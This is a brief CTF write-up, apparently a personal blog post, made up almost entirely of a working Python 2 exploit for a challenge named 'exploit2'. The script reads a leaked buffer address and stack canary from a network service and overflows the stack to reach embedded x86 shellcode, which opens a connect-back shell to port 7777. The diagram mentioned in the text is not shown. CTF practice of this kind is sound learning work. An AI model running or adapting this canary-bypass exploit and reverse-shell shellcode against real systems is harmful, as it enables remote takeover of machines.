
I've finally gotten started with CTFs. The thrill of solving a challenge seems far greater than with wargames.


exploit2

I don't think there's anything in particular to explain. A friend I study with didn't quite understand it, so I drew a diagram, and I'll attach that.



[exploit]

from socket import *
from struct import pack,unpack
import time

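# Little-endian 32-bit helpers (unsigned, so leaked addresses print as positive hex)
p=lambda x: pack("<L",x)
up=lambda x: unpack("<L",x)[0]

buffer=0x00000000  # placeholder; replaced below by the value the service sends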

shell =  ""
shell += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66"
shell += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0"
shell += "\xa8\x48\x94\x68\x02\x00\x1e\x61\x89\xe1\xb0\x66\x50"
shell += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73"
shell += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0"
shell += "\x0b\xcd\x80"

HOST="192.168.72.148"
PORT=31338

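s=socket(AF_INET,SOCK_STREAM)
s.connect((HOST,PORT))
# The service sends two 4-byte values first: the buffer address, then the canary
buffer=s.recv(4)
print"[*]Buffer:" +hex(up(buffer))
canary=s.recv(4)
print"[*]Canary:" +hex(up(canary))
s.recv(7777)  # read and discard whatever else the service sends before taking input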

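# Payload layout, as offsets from the start of the buffer:
#   0x000         NOP padding followed by the shellcode
#   0x800         the canary value received above, written back unchanged
#   0x804-0x80b   padding
#   0x80c         4 filler bytes ("GOOD")
#   0x810         the buffer address received above
Payload =""
Payload += "\x90"*30
Payload += shell
Payload += "\x90"*(0x800-len(Payload))
Payload += canary
Payload += "\x90"*(0x80c-len(Payload))
Payload += "GOOD"
Payload += buffer
print "[*]I need Your Password! By Symnoisy"
s.send(Payload)

raw_input("\n Give me !!!!>")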


